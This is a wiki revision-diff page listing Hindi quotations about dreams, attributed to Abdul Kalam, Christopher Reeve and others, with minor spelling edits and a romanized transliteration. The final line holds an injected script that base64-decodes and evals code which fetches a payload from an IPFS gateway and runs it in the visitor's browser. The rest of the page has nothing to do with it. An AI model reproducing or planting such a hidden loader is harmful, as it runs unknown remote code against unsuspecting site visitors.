Difference between revisions of "सपना (सूक्तियाँ)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "सृष्टा" to "स्रष्टा")
m (Text replacement - "डा." to "डॉ.")
 
(One intermediate revision by the same user not shown)
Line 11: Line 11:
 
| (2)
 
| (2)
 
| सपने देखना बेहद ज़रूरी है, लेकिन केवल सपने देखकर ही मंज़िल को हासिल नहीं किया जा सकता, सबसे ज़्यादा ज़रूरी है ज़िंदगी में खुद के लिए कोई लक्ष्य तय करना।   
 
| सपने देखना बेहद ज़रूरी है, लेकिन केवल सपने देखकर ही मंज़िल को हासिल नहीं किया जा सकता, सबसे ज़्यादा ज़रूरी है ज़िंदगी में खुद के लिए कोई लक्ष्य तय करना।   
| [[अब्दुल कलाम|डा. अब्दुल कलाम]]
+
| [[अब्दुल कलाम|डॉ. अब्दुल कलाम]]
 
|-
 
|-
 
| (3)
 
| (3)
| स्वप्न दृष्टा और यथार्थ के स्रष्टा बनिए।   
+
| स्वप्न द्रष्टाऔर यथार्थ के स्रष्टा बनिए।   
 
| अज्ञात
 
| अज्ञात
 
|-
 
|-
Line 23: Line 23:
 
| (5)
 
| (5)
 
| सपने देखना बेहद ज़रूरी है, लेकिन केवल सपने देखकर ही मंज़िल को हासिल नहीं किया जा सकता। सबसे ज़्यादा ज़रूरी है ज़िंदगी में खुद के लिए कोई लक्ष्य तय करना।   
 
| सपने देखना बेहद ज़रूरी है, लेकिन केवल सपने देखकर ही मंज़िल को हासिल नहीं किया जा सकता। सबसे ज़्यादा ज़रूरी है ज़िंदगी में खुद के लिए कोई लक्ष्य तय करना।   
| [[अब्दुल कलाम|डा. अब्दुल कलाम]]
+
| [[अब्दुल कलाम|डॉ. अब्दुल कलाम]]
 
|-
 
|-
 
| (6)
 
| (6)

Latest revision as of 09:51, 4 February 2021

kramaank sooktiyaan sookti karta
(1) hamare kee sapane shuroo mean asanbhav lagate haian, phir asanbhavy aur phir jab hamean sankalpashakti ati hai to ye sapane avashyanbhavi ho jate haian. kristophar riv
(2) sapane dekhana behad zaroori hai, lekin keval sapane dekhakar hi manzil ko hasil nahian kiya ja sakata, sabase zyada zaroori hai ziandagi mean khud ke lie koee lakshy tay karana. d aau. abdul kalam
(3) svapn drashtaaur yatharth ke srashta banie. ajnat
(4) abhilasha tabhi phaladayak hoti hai, jab vah dridh nishchay mean parinit kar de jati hai. svet marden
(5) sapane dekhana behad zaroori hai, lekin keval sapane dekhakar hi manzil ko hasil nahian kiya ja sakata. sabase zyada zaroori hai ziandagi mean khud ke lie koee lakshy tay karana. d aau. abdul kalam
(6) sapana vah nahian hota jo ap niand mean dekhate haian, yah to kuchh aisi chiz hai jo apako sone nahian deti hai. abdul kalam
(7) yadi ap kisi chiz ka sapana dekh sakate haian, to ap use prapt kar sakate haian. valt dizani
(8) koee sapana dekhe bina kuchh nahian hota. karl saiandabarg (1878-1967), kavi

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>